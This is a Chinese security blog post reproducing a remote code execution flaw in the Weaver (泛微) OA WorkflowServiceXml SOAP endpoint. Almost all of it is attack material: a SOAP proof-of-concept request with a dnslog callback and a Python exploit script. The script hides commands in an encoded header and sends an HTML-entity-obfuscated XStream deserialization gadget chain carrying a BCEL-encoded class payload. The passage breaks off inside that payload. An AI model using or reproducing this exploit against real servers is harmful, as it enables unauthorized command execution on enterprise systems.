泛微 WorkflowServiceXml RCE 复现

作者: print("") 分类: 信息安全 发布时间: 2021-06-09 14:34

POC:

POST /services%20/WorkflowServiceXml HTTP/1.1
Host: xxx.xxx
Content-Type: text/xml;charset=UTF-8
Content-Length: 496


<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:web="webservices.services.weaver.com.cn">
   <soapenv:Header/>
   <soapenv:Body>
      <web:doCreateWorkflowRequest>
    <web:string>&lt;map&gt;
  &lt;entry&gt;
    &lt;url&gt;http://wtc9gq.dnslog.cn</url>
    &lt;string&gt;&lt;/string&gt;
  &lt;/entry&gt;
&lt;/map&gt;</web:string>
        <web:string>2</web:string>
      </web:doCreateWorkflowRequest>
   </soapenv:Body>
</soapenv:Envelope>

执行命令

#! /usr/bin/env python
# -*- coding: utf-8 -*-
import urllib
import random
import base64
import requests


def encode(cmd):
    res = base64.b64encode(cmd)
    strs = res[::-1]
    return strs


def decode(content):
    content = urllib.unquote(content)
    strs = content[::-1]
    res = base64.b64decode(strs)
    return res


def exploit(url,cmd='ipconfig'):
    expurl = url + "/services%20/WorkflowServiceXml"
    cookies = {"JSESSIONID": "abcyPRTxFtGCX_WSXoKxx", "ecology_JSessionid": "abcyPRTxFtGCX_WSXoKxx", "testBanCookie": "test"}
    headers = {
        "WWW-Authenticate": encode(cmd),
        "Content-Type": "text/xml;charset=UTF-8",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8",
        "Connection": "close"
    }
    data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn">
   <soapenv:Header/>
   <soapenv:Body>
      <web:doCreateWorkflowRequest>    <web:string>
&#60;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#80;&#114;&#105;&#111;&#114;&#105;&#116;&#121;&#81;&#117;&#101;&#117;&#101;&#32;&#115;&#101;&#114;&#105;&#97;&#108;&#105;&#122;&#97;&#116;&#105;&#111;&#110;&#61;&#39;&#99;&#117;&#115;&#116;&#111;&#109;&#39;&#62;&#10;&#32;&#32;&#60;&#117;&#110;&#115;&#101;&#114;&#105;&#97;&#108;&#105;&#122;&#97;&#98;&#108;&#101;&#45;&#112;&#97;&#114;&#101;&#110;&#116;&#115;&#47;&#62;&#10;&#32;&#32;&#60;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#80;&#114;&#105;&#111;&#114;&#105;&#116;&#121;&#81;&#117;&#101;&#117;&#101;&#62;&#10;&#32;&#32;&#32;&#32;&#60;&#100;&#101;&#102;&#97;&#117;&#108;&#116;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#115;&#105;&#122;&#101;&#62;&#50;&#60;&#47;&#115;&#105;&#122;&#101;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#111;&#109;&#112;&#97;&#114;&#97;&#116;&#111;&#114;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#106;&#97;&#118;&#97;&#102;&#120;&#46;&#99;&#111;&#108;&#108;&#101;&#99;&#116;&#105;&#111;&#110;&#115;&#46;&#79;&#98;&#115;&#101;&#114;&#118;&#97;&#98;&#108;&#101;&#76;&#105;&#115;&#116;&#36;&#49;&#39;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#60;&#47;&#100;&#101;&#102;&#97;&#117;&#108;&#116;&#62;&#10;&#32;&#32;&#32;&#32;&#60;&#105;&#110;&#116;&#62;&#51;&#60;&#47;&#105;&#110;&#116;&#62;&#10;&#32;&#32;&#32;&#32;&#60;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#120;&#109;&#108;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#98;&#105;&#110;&#100;&#46;&#118;&#50;&#46;&#114;&#117;&#110;&#116;&#105;&#109;&#101;&#46;&#117;&#110;&#109;&#97;&#114;&#115;&#104;&#97;&#108;&#108;&#101;&#114;&#46;&#66;&#97;&#115;&#101;&#54;&#52;&#68;&#97;&#116;&#97;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#100;&#97;&#116;&#97;&#72;&#97;&#110;&#100;&#108;&#101;&#114;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#100;&#97;&#116;&#97;&#83;&#111;&#117;&#114;&#99;&#101;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#120;&#109;&#108;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#119;&#115;&#46;&#101;&#110;&#99;&#111;&#100;&#105;&#110;&#103;&#46;&#120;&#109;&#108;&#46;&#88;&#77;&#76;&#77;&#101;&#115;&#115;&#97;&#103;&#101;&#36;&#88;&#109;&#108;&#68;&#97;&#116;&#97;&#83;&#111;&#117;&#114;&#99;&#101;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#111;&#110;&#116;&#101;&#110;&#116;&#84;&#121;&#112;&#101;&#62;&#116;&#101;&#120;&#116;&#47;&#112;&#108;&#97;&#105;&#110;&#60;&#47;&#99;&#111;&#110;&#116;&#101;&#110;&#116;&#84;&#121;&#112;&#101;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#105;&#115;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#106;&#97;&#118;&#97;&#46;&#105;&#111;&#46;&#83;&#101;&#113;&#117;&#101;&#110;&#99;&#101;&#73;&#110;&#112;&#117;&#116;&#83;&#116;&#114;&#101;&#97;&#109;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#101;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#106;&#97;&#118;&#97;&#120;&#46;&#115;&#119;&#105;&#110;&#103;&#46;&#77;&#117;&#108;&#116;&#105;&#85;&#73;&#68;&#101;&#102;&#97;&#117;&#108;&#116;&#115;&#36;&#77;&#117;&#108;&#116;&#105;&#85;&#73;&#68;&#101;&#102;&#97;&#117;&#108;&#116;&#115;&#69;&#110;&#117;&#109;&#101;&#114;&#97;&#116;&#111;&#114;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#105;&#116;&#101;&#114;&#97;&#116;&#111;&#114;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#116;&#111;&#111;&#108;&#115;&#46;&#106;&#97;&#118;&#97;&#99;&#46;&#112;&#114;&#111;&#99;&#101;&#115;&#115;&#105;&#110;&#103;&#46;&#74;&#97;&#118;&#97;&#99;&#80;&#114;&#111;&#99;&#101;&#115;&#115;&#105;&#110;&#103;&#69;&#110;&#118;&#105;&#114;&#111;&#110;&#109;&#101;&#110;&#116;&#36;&#78;&#97;&#109;&#101;&#80;&#114;&#111;&#99;&#101;&#115;&#115;&#73;&#116;&#101;&#114;&#97;&#116;&#111;&#114;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#110;&#97;&#109;&#101;&#115;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#65;&#98;&#115;&#116;&#114;&#97;&#99;&#116;&#76;&#105;&#115;&#116;&#36;&#73;&#116;&#114;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#117;&#114;&#115;&#111;&#114;&#62;&#48;&#60;&#47;&#99;&#117;&#114;&#115;&#111;&#114;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#108;&#97;&#115;&#116;&#82;&#101;&#116;&#62;&#45;&#49;&#60;&#47;&#108;&#97;&#115;&#116;&#82;&#101;&#116;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#101;&#120;&#112;&#101;&#99;&#116;&#101;&#100;&#77;&#111;&#100;&#67;&#111;&#117;&#110;&#116;&#62;&#48;&#60;&#47;&#101;&#120;&#112;&#101;&#99;&#116;&#101;&#100;&#77;&#111;&#100;&#67;&#111;&#117;&#110;&#116;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#111;&#117;&#116;&#101;&#114;&#45;&#99;&#108;&#97;&#115;&#115;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#65;&#114;&#114;&#97;&#121;&#115;&#36;&#65;&#114;&#114;&#97;&#121;&#76;&#105;&#115;&#116;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#97;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#115;&#116;&#114;&#105;&#110;&#103;&#45;&#97;&#114;&#114;&#97;&#121;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#36;&#36;&#66;&#67;&#69;&#76;&#36;&#36;&#36;&#108;&#36;&#56;&#98;&#36;&#73;&#36;&#65;&#36;&#65;&#36;&#65;&#36;&#65;&#36;&#65;&#36;&#65;&#36;&#65;&#36;&#97;&#100;&#87;&#36;&#55;&#98;&#120;&#36;&#85;&#36;&#100;&#53;&#36;&#86;&#36;&#102;&#102;&#36;&#100;&#100;&#100;&#119;&#103;&#50;&#36;&#57;&#57;&#36;&#56;&#53;&#100;&#66;&#36;&#67;&#36;&#56;&#51;&#36;&#80;&#36;&#57;&#54;&#36;&#65;&#113;&#36;&#66;&#119;&#36;&#88;&#36;&#100;&#48;&#36;&#97;&#50;&#78;&#36;&#56;&#56;&#36;&#57;&#50;&#36;&#99;&#52;&#36;&#54;&#48;&#36;&#67;&#36;&#110;&#104;&#54;&#36;&#89;&#36;&#68;&#36;&#67;&#36;&#36;&#36;&#98;&#51;&#36;&#57;&#51;&#100;&#97;&#119;&#102;&#36;&#57;&#100;&#36;&#57;&#100;&#36;&#114;&#80;&#107;&#36;&#100;&#53;&#36;&#57;&#54;&#36;&#98;&#101;&#95;&#86;&#36;&#53;&#98;&#36;&#119;&#36;&#98;&#54;&#36;&#98;&#53;&#106;&#36;&#97;&#53;&#105;&#36;&#101;&#100;&#67;&#109;&#36;&#101;&#98;&#36;&#115;&#36;&#114;&#36;&#56;&#50;&#36;&#98;&#54;&#36;&#97;&#53;&#104;&#36;&#97;&#57;&#36;&#55;&#100;&#36;&#100;&#49;&#36;&#97;&#97;&#36;&#97;&#100;&#36;&#99;&#53;&#36;&#100;&#97;&#98;&#36;&#100;&#102;&#79;&#36;&#102;&#98;&#36;&#102;&#56;&#36;&#97;&#51;&#95;&#36;&#98;&#102;&#36;&#55;&#101;&#36;&#97;&#52;&#36;&#101;&#55;&#36;&#99;&#101;&#102;&#36;&#57;&#51;&#36;&#121;&#36;&#100;&#57;&#36;&#75;&#36;&#55;&#102;&#52;&#95;&#114;&#103;&#36;&#101;&#101;&#57;&#36;&#101;&#55;&#36;&#102;&#101;&#36;&#99;&#101;&#36;&#102;&#98;&#36;&#100;&#99;&#36;&#99;&#57;&#36;&#56;&#57;&#51;&#36;&#56;&#55;&#36;&#56;&#102;&#36;&#67;&#88;&#36;&#56;&#53;&#36;&#55;&#102;&#72;&#36;&#56;&#56;&#36;&#97;&#48;&#95;&#36;&#99;&#52;&#36;&#56;&#48;&#36;&#56;&#56;&#65;&#36;&#74;&#36;&#74;&#36;&#101;&#99;&#36;&#57;&#50;&#36;&#109;&#98;&#36;&#98;&#55;&#36;&#56;&#56;&#36;&#113;&#36;&#55;&#102;&#36;&#97;&#54;&#36;&#69;&#36;&#57;&#56;&#36;&#111;&#36;&#121;&#36;&#82;&#105;&#36;&#82;&#36;&#98;&#55;&#36;&#56;&#97;&#36;&#98;&#48;&#36;&#114;&#100;&#36;&#101;&#48;&#36;&#102;&#48;&#36;&#114;&#36;&#120;&#97;&#36;&#80;&#36;&#56;&#54;&#36;&#69;&#36;&#101;&#99;&#36;&#57;&#53;&#80;&#36;&#56;&#53;&#36;&#55;&#100;&#36;&#67;&#36;&#100;&#101;&#36;&#121;&#65;&#36;&#99;&#49;&#109;&#36;&#55;&#99;&#121;&#36;&#56;&#98;&#36;&#56;&#48;&#36;&#100;&#98;&#36;&#114;&#36;&#100;&#52;&#36;&#97;&#50;&#36;&#57;&#102;&#36;&#95;&#111;&#36;&#101;&#53;&#36;&#99;&#98;&#36;&#106;&#36;&#105;&#36;&#101;&#57;&#78;&#36;&#82;&#119;&#36;&#102;&#49;&#36;&#56;&#51;&#111;&#36;&#84;&#36;&#102;&#48;&#118;&#36;&#74;&#36;&#88;&#99;&#36;&#98;&#102;&#36;&#56;&#48;&#119;&#36;&#56;&#56;&#120;&#36;&#97;&#55;&#36;&#56;&#52;&#36;&#81;&#36;&#100;&#101;&#36;&#114;&#36;&#101;&#49;&#36;&#100;&#100;&#120;&#36;&#80;&#95;&#36;&#100;&#101;&#36;&#120;&#36;&#101;&#50;&#36;&#55;&#100;&#36;&#57;&#99;&#36;&#102;&#50;&#36;&#55;&#101;&#36;&#82;&#36;&#108;&#36;&#81;&#36;&#102;&#48;&#65;&#36;&#82;&#36;&#108;&#36;&#83;&#113;&#55;&#36;&#98;&#55;&#36;&#101;&#102;&#36;&#99;&#51;&#36;&#57;&#99;&#122;&#36;&#56;&#102;&#36;&#56;&#56;&#36;&#55;&#98;&#69;&#36;&#55;&#99;&#68;&#36;&#99;&#48;&#71;&#36;&#102;&#57;&#36;&#101;&#101;&#36;&#56;&#48;&#36;&#56;&#48;&#36;&#56;&#102;&#36;&#56;&#57;&#36;&#98;&#56;&#79;&#36;&#99;&#50;&#65;&#36;&#100;&#99;&#36;&#95;&#36;&#101;&#48;&#36;&#101;&#51;&#36;&#83;&#36;&#98;&#57;&#36;&#100;&#50;&#36;&#95;&#36;&#101;&#48;&#36;&#84;&#36;&#83;&#36;&#36;&#36;&#99;&#55;&#36;&#116;&#36;&#102;&#57;&#36;&#102;&#50;&#36;&#65;&#95;&#36;&#101;&#101;&#36;&#101;&#48;&#36;&#101;&#52;&#79;&#113;&#36;&#102;&#100;&#36;&#80;&#36;&#75;&#120;&#72;&#36;&#56;&#50;&#36;&#99;&#54;&#36;&#99;&#100;&#36;&#101;&#97;&#36;&#99;&#52;&#36;&#99;&#51;&#36;&#57;&#99;&#36;&#102;&#50;&#105;&#36;&#98;&#101;&#36;&#55;&#100;&#68;&#36;&#99;&#50;&#36;&#110;&#36;&#55;&#99;&#36;&#56;&#54;&#111;&#36;&#56;&#55;&#69;&#36;&#55;&#99;&#36;&#57;&#54;&#36;&#101;&#51;&#36;&#55;&#101;&#78;&#36;&#99;&#52;&#36;&#97;&#51;&#36;&#111;&#36;&#51;&#101;&#36;&#95;&#36;&#101;&#50;&#36;&#76;&#36;&#111;&#36;&#98;&#101;&#36;&#99;&#56;&#36;&#90;&#95;&#36;&#101;&#50;&#36;&#51;&#101;&#36;&#51;&#99;&#36;&#115;&#36;&#101;&#50;&#113;&#36;&#82;&#79;&#36;&#56;&#56;&#36;&#102;&#56;&#36;&#98;&#50;&#36;&#56;&#48;&#36;&#97;&#102;&#48;&#36;&#102;&#56;&#36;&#100;&#54;&#36;&#113;&#36;&#99;&#99;&#36;&#56;&#52;&#115;&#53;&#67;&#121;&#112;&#36;&#101;&#57;&#36;&#56;&#100;&#36;&#77;&#36;&#57;&#101;&#86;&#36;&#120;&#110;&#48;&#36;&#99;&#99;&#36;&#101;&#101;&#76;&#36;&#57;&#56;&#70;&#87;&#54;&#36;&#98;&#53;&#36;&#100;&#51;&#36;&#98;&#48;&#36;&#55;&#98;&#98;&#36;&#51;&#98;&#36;&#57;&#51;&#68;&#36;&#97;&#57;&#52;&#36;&#102;&#54;&#36;&#103;&#122;&#36;&#97;&#98;&#36;&#57;&#53;&#74;&#36;&#99;&#53;&#36;&#99;&#99;&#56;&#67;&#67;&#36;&#98;&#48;&#115;&#87;&#108;&#79;&#36;&#121;&#36;&#57;&#50;&#36;&#56;&#99;&#36;&#57;&#57;&#36;&#68;&#36;&#57;&#49;&#36;&#97;&#56;&#99;&#36;&#116;&#36;&#99;&#99;&#36;&#56;&#49;&#36;&#99;&#54;&#36;&#97;&#53;&#51;&#73;&#36;&#77;&#36;&#102;&#101;&#36;&#97;&#56;&#36;&#84;&#36;&#100;&#51;&#119;&#111;&#36;&#56;&#99;&#36;&#97;&#53;&#36;&#53;&#100;&#36;&#89;&#36;&#99;&#97;&#36;&#56;&#49;&#36;&#56;&#48;&#36;&#97;&#102;&#36;&#75;&#120;&#82;&#36;&#52;&#48;&#36;&#56;&#101;&#36;&#111;&#78;&#36;&#99;&#49;&#36;&#97;&#54;&#36;&#89;&#36;&#75;&#36;&#89;&#97;&#36;&#57;&#48;&#36;&#100;&#97;&#36;&#102;&#54;&#36;&#101;&#97;&#70;&#36;&#100;&#97;&#73;&#88;&#102;&#70;&#36;&#99;&#48;&#36;&#117;&#36;&#56;&#51;&#36;&#98;&#56;&#70;&#79;&#36;&#98;&#97;&#36;&#56;&#54;&#81;&#112;&#36;&#70;&#36;&#55;&#99;&#36;&#56;&#100;&#36;&#111;&#68;&#36;&#99;&#49;&#36;&#83;&#112;&#36;&#57;&#56;&#36;&#113;&#36;&#97;&#51;&#86;&#36;&#100;&#54;&#36;&#100;&#54;&#36;&#56;&#100;&#117;&#36;&#74;&#110;&#36;&#57;&#53;&#36;&#98;&#102;&#36;&#100;&#98;&#36;&#99;&#56;&#36;&#97;&#52;&#36;&#101;&#57;&#36;&#56;&#99;&#36;&#82;&#36;&#101;&#54;&#36;&#98;&#97;&#101;&#108;&#68;&#36;&#88;&#36;&#68;&#36;&#89;&#36;&#69;&#36;&#120;&#36;&#84;&#54;&#99;&#36;&#118;&#82;&#56;&#36;&#115;&#36;&#101;&#51;&#36;&#118;&#116;&#36;&#99;&#98;&#56;&#36;&#56;&#50;&#36;&#97;&#51;&#36;&#101;&#52;&#36;&#101;&#51;&#80;&#36;&#99;&#50;&#36;&#57;&#52;&#36;&#102;&#49;&#52;&#36;&#57;&#101;&#97;&#36;&#97;&#56;&#36;&#51;&#97;&#36;&#100;&#98;&#88;&#36;&#51;&#97;&#36;&#97;&#52;&#36;&#97;&#55;&#36;&#101;&#50;&#97;&#114;&#36;&#57;&#51;&#36;&#97;&#49;&#36;&#121;&#36;&#97;&#50;&#36;&#100;&#51;&#54;&#36;&#98;&#50;&#51;&#97;&#70;&#50;&#36;&#56;&#51;&#36;&#98;&#52;&#36;&#78;&#36;&#101;&#57;&#36;&#67;&#36;&#98;&#101;&#36;&#36;&#36;&#101;&#51;&#36;&#104;&#36;&#102;&#56;&#36;&#97;&#54;&#36;&#56;&#99;&#99;&#36;&#102;&#56;&#36;&#87;&#57;&#36;&#109;&#36;&#101;&#51;&#56;&#36;&#57;&#101;&#101;&#80;&#36;&#53;&#100;&#36;&#57;&#52;&#36;&#56;&#52;&#36;&#86;&#36;&#101;&#57;&#48;&#36;&#100;&#51;&#89;&#36;&#56;&#55;&#36;&#56;&#48;&#36;&#56;&#99;&#88;&#36;&#97;&#97;&#36;&#100;&#98;&#36;&#56;&#56;&#36;&#99;&#53;&#36;&#78;&#36;&#57;&#98;&#36;&#100;&#98;&#36;&#102;&#50;&#36;&#105;&#67;&#36;&#53;&#100;&#65;&#36;&#97;&#48;&#36;&#114;&#36;&#100;&#98;&#36;&#100;&#102;&#111;&#36;&#100;&#56;&#70;&#36;&#55;&#99;&#36;&#56;&#97;&#36;&#102;&#98;&#109;&#36;&#90;&#36;&#116;&#36;&#98;&#56;&#81;&#115;&#36;&#99;&#102;&#36;&#98;&#54;&#36;&#97;&#52;&#36;&#114;&#36;&#57;&#98;&#72;&#36;&#98;&#97;&#50;&#36;&#100;&#102;&#36;&#99;&#49;&#36;&#102;&#51;&#50;&#36;&#98;&#101;&#36;&#56;&#98;&#36;&#97;&#51;&#50;&#36;&#98;&#101;&#36;&#56;&#55;&#36;&#101;&#102;&#51;&#36;&#100;&#52;&#119;&#89;&#36;&#66;&#36;&#100;&#98;&#36;&#99;&#56;&#100;&#36;&#57;&#51;&#78;&#36;&#99;&#48;&#36;&#98;&#50;&#36;&#68;&#36;&#90;&#36;&#120;&#101;&#56;&#36;&#56;&#51;&#36;&#113;&#36;&#107;&#36;&#89;&#50;&#76;&#36;&#116;&#48;&#100;&#36;&#53;&#98;&#36;&#101;&#54;&#36;&#99;&#48;&#66;&#110;&#36;&#100;&#101;&#36;&#80;&#36;&#89;&#106;&#36;&#97;&#54;&#36;&#109;&#36;&#116;&#36;&#101;&#51;&#36;&#119;&#36;&#101;&#51;&#36;&#56;&#55;&#56;&#89;&#36;&#101;&#52;&#119;&#36;&#99;&#102;&#36;&#109;&#36;&#57;&#57;&#75;&#36;&#99;&#57;&#36;&#57;&#52;&#36;&#106;&#36;&#102;&#55;&#36;&#97;&#53;&#36;&#100;&#51;&#36;&#100;&#50;&#99;&#36;&#99;&#57;&#36;&#56;&#99;&#36;&#56;&#99;&#36;&#108;&#36;&#101;&#49;&#36;&#99;&#55;&#36;&#85;&#113;&#36;&#90;&#36;&#95;&#36;&#101;&#48;&#69;&#36;&#90;&#36;&#95;&#36;&#101;&#49;&#36;&#116;&#36;&#77;&#36;&#56;&#98;&#36;&#102;&#57;&#36;&#57;&#57;&#48;&#36;&#51;&#102;&#36;&#84;&#36;&#101;&#101;&#36;&#57;&#57;&#36;&#83;&#36;&#53;&#100;&#36;&#51;&#99;&#36;&#101;&#100;&#36;&#57;&#100;&#36;&#83;&#36;&#121;&#36;&#101;&#51;&#36;&#97;&#55;&#120;&#36;&#57;&#57;&#36;&#99;&#49;&#36;&#101;&#98;&#36;&#101;&#52;&#36;&#101;&#98;&#36;&#97;&#53;&#102;&#36;&#101;&#98;&#36;&#98;&#52;&#114;&#36;&#100;&#56;&#36;&#98;&#52;&#115;&#36;&#57;&#55;&#36;&#97;&#49;&#36;&#51;&#98;&#84;&#36;&#79;&#36;&#99;&#98;&#36;&#99;&#101;&#36;&#72;&#105;&#113;&#36;&#57;&#98;&#36;&#101;&#57;&#36;&#100;&#56;&#36;&#102;&#98;&#36;&#73;&#106;&#79;&#36;&#121;&#36;&#57;&#57;&#53;&#100;&#36;&#102;&#99;&#36;&#77;&#36;&#97;&#55;&#100;&#36;&#98;&#99;&#36;&#99;&#50;&#67;&#85;&#36;&#97;&#102;&#36;&#53;&#98;&#36;&#97;&#57;&#36;&#98;&#48;&#36;&#107;&#36;&#99;&#98;&#36;&#101;&#97;&#36;&#56;&#51;&#86;&#56;&#99;&#36;&#100;&#56;&#36;&#55;&#98;&#36;&#77;&#36;&#51;&#98;&#36;&#51;&#99;&#36;&#101;&#56;&#56;&#36;&#101;&#57;&#112;&#36;&#51;&#98;&#36;&#122;&#36;&#100;&#100;&#36;&#99;&#54;&#36;&#97;&#100;&#89;&#36;&#112;&#36;&#101;&#51;&#48;&#84;&#36;&#77;&#36;&#89;&#78;&#36;&#98;&#98;&#36;&#104;&#101;&#36;&#97;&#97;&#36;&#101;&#51;&#36;&#118;&#36;&#104;&#90;&#36;&#57;&#51;&#36;&#98;&#49;&#36;&#77;&#121;&#36;&#102;&#55;&#115;&#36;&#98;&#99;&#90;&#36;&#85;&#36;&#56;&#52;&#36;&#98;&#99;&#105;&#68;&#36;&#101;&#97;&#36;&#101;&#100;&#36;&#101;&#100;&#36;&#78;&#53;&#103;&#36;&#57;&#100;&#65;&#36;&#75;&#102;&#66;&#36;&#56;&#102;&#57;&#84;&#36;&#51;&#97;&#36;&#56;&#55;&#101;&#36;&#102;&#99;&#36;&#67;&#36;&#98;&#102;&#36;&#97;&#52;&#36;&#105;&#102;&#36;&#98;&#50;&#102;&#36;&#113;&#36;&#57;&#53;&#36;&#99;&#56;&#36;&#101;&#56;&#36;&#57;&#49;&#36;&#57;&#54;&#36;&#101;&#54;&#104;&#36;&#100;&#98;&#36;&#101;&#97;&#36;&#99;&#98;&#36;&#97;&#102;&#53;&#116;&#36;&#99;&#98;&#69;&#36;&#97;&#102;&#36;&#57;&#98;&#36;&#57;&#57;&#57;&#36;&#57;&#101;&#100;&#36;&#57;&#101;&#36;&#100;&#99;&#36;&#100;&#51;&#50;&#36;&#53;&#101;&#36;&#99;&#51;&#36;&#97;&#102;&#100;&#36;&#102;&#99;&#36;&#103;&#36;&#98;&#102;&#36;&#101;&#49;&#36;&#100;&#98;&#36;&#100;&#102;&#36;&#99;&#101;&#68;&#105;&#51;&#36;&#53;&#100;&#36;&#85;&#36;&#90;&#55;&#36;&#102;&#48;&#36;&#102;&#50;&#36;&#102;&#99;&#36;&#106;&#36;&#55;&#101;&#36;&#95;&#36;&#101;&#51;&#36;&#80;&#36;&#102;&#56;&#36;&#97;&#51;&#36;&#56;&#48;&#36;&#51;&#102;&#36;&#102;&#49;&#36;&#116;&#81;&#36;&#102;&#101;&#36;&#56;&#99;&#36;&#98;&#102;&#48;&#36;&#121;&#36;&#100;&#52;&#36;&#102;&#51;&#36;&#106;&#36;&#88;&#36;&#101;&#48;&#36;&#100;&#100;&#36;&#57;&#55;&#117;&#36;&#56;&#99;&#120;&#36;&#54;&#48;&#103;&#36;&#100;&#54;&#36;&#74;&#36;&#57;&#56;&#36;&#57;&#54;&#36;&#99;&#51;&#36;&#76;&#36;&#99;&#49;&#36;&#122;&#36;&#55;&#99;&#36;&#90;&#36;&#55;&#102;&#36;&#99;&#53;&#36;&#118;&#114;&#122;&#71;&#36;&#56;&#49;&#36;&#52;&#48;&#36;&#102;&#57;&#36;&#97;&#52;&#36;&#65;&#116;&#36;&#99;&#55;&#36;&#56;&#54;&#54;&#101;&#36;&#106;&#36;&#97;&#97;&#73;&#36;&#97;&#97;&#36;&#101;&#51;&#52;&#36;&#57;&#57;&#36;&#101;&#54;&#36;&#113;&#77;&#36;&#56;&#54;&#36;&#56;&#51;&#36;&#101;&#100;&#36;&#51;&#100;&#36;&#51;&#100;&#36;&#100;&#55;&#71;&#86;&#36;&#56;&#54;&#87;&#36;&#71;&#86;&#36;&#97;&#100;&#88;&#36;&#82;&#36;&#100;&#56;&#36;&#98;&#52;&#65;&#36;&#56;&#97;&#36;&#98;&#97;&#49;&#36;&#100;&#52;&#36;&#67;&#36;&#100;&#52;&#69;&#84;&#36;&#101;&#97;&#36;&#57;&#55;&#36;&#56;&#53;&#36;&#56;&#57;&#36;&#98;&#53;&#74;&#36;&#98;&#97;&#36;&#118;&#36;&#98;&#52;&#36;&#98;&#57;&#57;&#68;&#36;&#57;&#100;&#36;&#57;&#101;&#36;&#56;&#101;&#57;&#36;&#74;&#74;&#36;&#97;&#53;&#36;&#87;&#36;&#101;&#56;&#104;&#107;&#50;&#36;&#101;&#50;&#36;&#68;&#36;&#99;&#54;&#36;&#97;&#53;&#36;&#102;&#97;&#36;&#97;&#48;&#77;&#53;&#36;&#100;&#55;&#36;&#98;&#52;&#82;&#106;&#36;&#98;&#53;&#76;&#36;&#56;&#55;&#36;&#99;&#50;&#36;&#85;&#114;&#36;&#53;&#100;&#36;&#109;&#36;&#98;&#55;&#36;&#98;&#53;&#36;&#52;&#48;&#36;&#111;&#36;&#99;&#101;&#36;&#99;&#51;&#36;&#101;&#54;&#36;&#101;&#99;&#36;&#57;&#98;&#100;&#36;&#102;&#53;&#36;&#101;&#99;&#75;&#36;&#100;&#51;&#73;&#36;&#99;&#55;&#36;&#100;&#56;&#36;&#101;&#98;&#68;&#36;&#71;&#36;&#57;&#100;&#84;&#36;&#98;&#50;&#49;&#36;&#97;&#48;&#36;&#80;&#36;&#99;&#54;&#36;&#101;&#99;&#36;&#56;&#99;&#36;&#101;&#49;&#52;&#101;&#36;&#57;&#100;&#36;&#102;&#101;&#36;&#100;&#48;&#36;&#57;&#53;&#36;&#57;&#51;&#98;&#36;&#57;&#100;&#36;&#56;&#54;&#57;&#36;&#101;&#48;&#36;&#77;&#106;&#36;&#66;&#36;&#90;&#36;&#97;&#102;&#36;&#101;&#51;&#111;&#36;&#98;&#99;&#36;&#101;&#48;&#36;&#102;&#102;&#78;&#36;&#51;&#100;&#36;&#99;&#53;&#36;&#98;&#57;&#36;&#115;&#36;&#114;&#36;&#56;&#53;&#36;&#56;&#97;&#86;&#36;&#76;&#36;&#101;&#56;&#73;&#36;&#120;&#99;&#72;&#36;&#83;&#36;&#99;&#102;&#76;&#36;